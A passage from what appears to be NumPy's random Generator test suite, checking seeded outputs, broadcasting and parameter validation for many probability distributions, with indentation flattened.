method='cholesky')
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov, method=method)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='other')
assert_raises(ValueError, random.multivariate_normal,
np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal,
mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal,
mu, np.eye(3))
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal_basic_stats(self, method):
random = Generator(MT19937(self.seed))
n_s = 1000
mean = np.array([1, 2])
cov = np.array([[2, 1], [1, 2]])
s = random.multivariate_normal(mean, cov, size=(n_s,), method=method)
s_center = s - mean
cov_emp = (s_center.T @ s_center) / (n_s - 1)
# these are pretty loose and are only designed to detect major errors
assert np.all(np.abs(s_center.mean(-2)) < 0.1)
assert np.all(np.abs(cov_emp - cov) < 0.2)
def test_negative_binomial(self):
random = Generator(MT19937(self.seed))
actual = random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[543, 727],
[775, 760],
[600, 674]])
assert_array_equal(actual, desired)
def test_negative_binomial_exceptions(self):
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.negative_binomial, 100, np.nan)
assert_raises(ValueError, random.negative_binomial, 100,
[np.nan] * 10)
def test_negative_binomial_p0_exception(self):
# Verify that p=0 raises an exception.
with assert_raises(ValueError):
x = random.negative_binomial(1, 0)
def test_noncentral_chisquare(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[ 1.70561552362133, 15.97378184942111],
[13.71483425173724, 20.17859633310629],
[11.3615477156643 , 3.67891108738029]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[9.41427665607629e-04, 1.70473157518850e-04],
[1.14554372041263e+00, 1.38187755933435e-03],
[1.90659181905387e+00, 1.21772577941822e+00]])
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[0.82947954590419, 1.80139670767078],
[6.58720057417794, 7.00491463609814],
[6.31101879073157, 6.30982307753005]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[0.060310671139 , 0.23866058175939],
[0.86860246709073, 0.2668510459738 ],
[0.23375780078364, 1.88922102885943]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f_nan(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
assert np.isnan(actual)
def test_normal(self):
random = Generator(MT19937(self.seed))
actual = random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-3.618412914693162, 2.635726692647081],
[-2.116923463013243, 0.807460983059643],
[ 1.446547137248593, 2.485684213886024]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(random.normal(scale=0), 0)
assert_raises(ValueError, random.normal, scale=-0.)
def test_pareto(self):
random = Generator(MT19937(self.seed))
actual = random.pareto(a=.123456789, size=(3, 2))
desired = np.array([[1.0394926776069018e+00, 7.7142534343505773e+04],
[7.2640150889064703e-01, 3.4650454783825594e+05],
[4.5852344481994740e+04, 6.5851383009539105e+07]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
random = Generator(MT19937(self.seed))
actual = random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[0, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('int64').max
lamneg = -1
assert_raises(ValueError, random.poisson, lamneg)
assert_raises(ValueError, random.poisson, [lamneg] * 10)
assert_raises(ValueError, random.poisson, lambig)
assert_raises(ValueError, random.poisson, [lambig] * 10)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.poisson, np.nan)
assert_raises(ValueError, random.poisson, [np.nan] * 10)
def test_power(self):
random = Generator(MT19937(self.seed))
actual = random.power(a=.123456789, size=(3, 2))
desired = np.array([[1.977857368842754e-09, 9.806792196620341e-02],
[2.482442984543471e-10, 1.527108843266079e-01],
[8.188283434244285e-02, 3.950547209346948e-01]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[ 4.51734079831581, 15.6802442485758 ],
[ 4.19850651287094, 17.08718809823704],
[14.7907457708776 , 15.85545333419775]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(random.rayleigh(scale=0), 0)
assert_raises(ValueError, random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
random = Generator(MT19937(self.seed))
actual = random.standard_cauchy(size=(3, 2))
desired = np.array([[-1.489437778266206, -3.275389641569784],
[ 0.560102864910406, -0.680780916282552],
[-1.314912905226277, 0.295852965660225]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
random = Generator(MT19937(self.seed))
actual = random.standard_exponential(size=(3, 2), method='inv')
desired = np.array([[0.102031839440643, 1.229350298474972],
[0.088137284693098, 1.459859985522667],
[1.093830802293668, 1.256977002164613]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential_type_error(self):
assert_raises(TypeError, random.standard_exponential, dtype=np.int32)
def test_standard_gamma(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[0.62970724056362, 1.22379851271008],
[3.899412530884 , 4.12479964250139],
[3.74994102464584, 3.74929307690815]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_scalar_float(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(3, dtype=np.float32)
desired = 2.9242148399353027
assert_array_almost_equal(actual, desired, decimal=6)
def test_standard_gamma_float(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[0.62971, 1.2238 ],
[3.89941, 4.1248 ],
[3.74994, 3.74929]])
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gamma_float_out(self):
actual = np.zeros((3, 2), dtype=np.float32)
random = Generator(MT19937(self.seed))
random.standard_gamma(10.0, out=actual, dtype=np.float32)
desired = np.array([[10.14987, 7.87012],
[ 9.46284, 12.56832],
[13.82495, 7.81533]], dtype=np.float32)
assert_array_almost_equal(actual, desired, decimal=5)
random = Generator(MT19937(self.seed))
random.standard_gamma(10.0, out=actual, size=(3, 2), dtype=np.float32)
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gamma_unknown_type(self):
assert_raises(TypeError, random.standard_gamma, 1.,
dtype='int32')
def test_out_size_mismatch(self):
out = np.zeros(10)
assert_raises(ValueError, random.standard_gamma, 10.0, size=20,
out=out)
assert_raises(ValueError, random.standard_gamma, 10.0, size=(10, 1),
out=out)
def test_standard_gamma_0(self):
assert_equal(random.standard_gamma(shape=0), 0)
assert_raises(ValueError, random.standard_gamma, shape=-0.)
def test_standard_normal(self):
random = Generator(MT19937(self.seed))
actual = random.standard_normal(size=(3, 2))
desired = np.array([[-1.870934851846581, 1.25613495182354 ],
[-1.120190126006621, 0.342002097029821],
[ 0.661545174124296, 1.181113712443012]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_normal_unsupported_type(self):
assert_raises(TypeError, random.standard_normal, dtype=np.int32)
def test_standard_t(self):
random = Generator(MT19937(self.seed))
actual = random.standard_t(df=10, size=(3, 2))
desired = np.array([[-1.484666193042647, 0.30597891831161 ],
[ 1.056684299648085, -0.407312602088507],
[ 0.130704414281157, -2.038053410490321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
random = Generator(MT19937(self.seed))
actual = random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[ 7.86664070590917, 13.6313848513185 ],
[ 7.68152445215983, 14.36169131136546],
[13.16105603911429, 13.72341621856971]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
random = Generator(MT19937(self.seed))
actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[2.13306255040998 , 7.816987531021207],
[2.015436610109887, 8.377577533009589],
[7.421792588856135, 7.891185744455209]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh-8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, random.uniform, throwing_float,
throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[ 1.107972248690106, 2.841536476232361],
[ 1.832602376042457, 1.945511926976032],
[-0.260147475776542, 2.058047492231698]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
random = Generator(MT19937(self.seed))
r = random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
assert_(np.isfinite(r).all())
def test_vonmises_nan(self):
random = Generator(MT19937(self.seed))
r = random.vonmises(mu=0., kappa=np.nan)
assert_(np.isnan(r))
def test_wald(self):
random = Generator(MT19937(self.seed))
actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[0.26871721804551, 3.2233942732115 ],
[2.20328374987066, 2.40958405189353],
[2.07093587449261, 0.73073890064369]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
random = Generator(MT19937(self.seed))
actual = random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.138613914769468, 1.306463419753191],
[0.111623365934763, 1.446570494646721],
[1.257145775276011, 1.914247725027957]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
random = Generator(MT19937(self.seed))
assert_equal(random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, random.weibull, a=-0.)
def test_zipf(self):
random = Generator(MT19937(self.seed))
actual = random.zipf(a=1.23, size=(3, 2))
desired = np.array([[ 1, 1],
[ 10, 867],
[354, 2]])
assert_array_equal(actual, desired)
class TestBroadcast:
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def test_uniform(self):
random = Generator(MT19937(self.seed))
low = [0]
high = [1]
uniform = random.uniform
desired = np.array([0.16693771389729, 0.19635129550675, 0.75563050964095])
random = Generator(MT19937(self.seed))
actual = random.uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
random = Generator(MT19937(self.seed))
desired = np.array([-0.38736406738527, 0.79594375042255, 0.0197076236097])
random = Generator(MT19937(self.seed))
actual = random.normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.normal, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
normal = random.normal
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
desired = np.array([0.18719338682602, 0.73234824491364, 0.17928615186455])
random = Generator(MT19937(self.seed))
beta = random.beta
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
random = Generator(MT19937(self.seed))
actual = random.beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
std_gamma = random.standard_gamma
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
desired = np.array([1.34491986425611, 0.42760990636187, 1.4355697857258])
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
desired = np.array([0.07765056244107, 7.72951397913186, 0.05786093891763])
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
desired = np.array([2.02434240411421, 12.91838601070124, 1.24395160354629])
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
random = Generator(MT19937(self.seed))
desired = np.array([0.04714867120827, 0.1239390327694])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
desired = np.array([0.05573640064251, 1.47220224353539, 2.9469379318589])
random = Generator(MT19937(self.seed))
actual = random.chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
desired = np.array([0.07710766249436, 5.27829115110304, 0.630732147399])
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
desired = np.array([-1.39498829447098, -1.23058658835223, 0.17207021065983])
random = Generator(MT19937(self.seed))
actual = random.standard_t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
desired = np.array([2.25935584988528, 2.23326261461399, -2.84152146503326])
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu * 3, bad_kappa)
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
desired = np.array([0.95905052946317, 0.2383810889437 , 1.04988745750013])
random = Generator(MT19937(self.seed))
actual = random.pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
desired = np.array([0.48954864361052, 0.19249412888486, 0.51216834058807])
random = Generator(MT19937(self.seed))
actual = random.power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.09698732625119, -0.93470271947368, 0.71592671378202])
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([1.70020068231762, 1.52054354273631, -0.34293267607081])
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.607487640433, -1.40925686003678, 1.12887112820397])
random = Generator(MT19937(self.seed))
actual = random.logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc, bad_scale * 3)
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
desired = np.array([0.67884390500697, 2.21653186290321, 1.01990310084276])
random = Generator(MT19937(self.seed))
lognormal = random.lognormal
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
random = Generator(MT19937(self.seed))
        actual = random.lognormal(mean, sigma * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.60439534475066, 0.66120048396359, 1.67873398389499])
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
desired = np.array([0.38052407392905, 0.50701641508592, 0.484935249864])
random = Generator(MT19937(self.seed))
actual = random.wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean, scale * 3)
assert_raises(ValueError, random.wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
desired = np.array([1.57781954604754, 1.62665986867957, 2.30090130831326])
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
assert_raises(ValueError, triangular, 10., 0., 20.)
assert_raises(ValueError, triangular, 10., 25., 20.)
assert_raises(ValueError, triangular, 10., 10., 10.)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
binom = random.binomial
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
actual = random.binomial(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 2, 1], dtype=np.int64)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
lam = [1]
bad_lam_one = [-1]
desired = np.array([0, 0, 3])
random = Generator(MT19937(self.seed))
max_lam = random._poisson_lam_max
bad_lam_two = [max_lam * 2]
poisson = random.poisson
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
desired = np.array([1, 8, 1])
random = Generator(MT19937(self.seed))
zipf = random.zipf
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([1, 1, 3])
random = Generator(MT19937(self.seed))
geometric = random.geometric
actual = geometric(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geometric, bad_p_one * 3)
assert_raises(ValueError, geometric, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [-1]
bad_nsample_two = [4]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_two)
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_two)
random = Generator(MT19937(self.seed))
hypergeom = random.hypergeometric
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, -1)
assert_raises(ValueError, hypergeom, 10, 10, 25)
# ValueError for arguments that are too big.
assert_raises(ValueError, hypergeom, 2**30, 10, 20)
assert_raises(ValueError, hypergeom, 999, 2**31, 50)
assert_raises(ValueError, hypergeom, 999, [2**29, 2**30], 1000)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
desired = np.array([1, 1, 1])
random = Generator(MT19937(self.seed))
logseries = random.logseries
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
def test_multinomial(self):
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]],
[[1, 0, 1, 0, 2, 1],
[7, 2, 2, 1, 4, 4]],
[[0, 2, 0, 1, 2, 0],
[3, 2, 3, 3, 4, 5]]], dtype=np.int64)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6)
desired = np.array([[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]], dtype=np.int64)
assert_array_equal(actual, desired)
class TestThread:
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(Generator(MT19937(s)), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(Generator(MT19937(s)), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
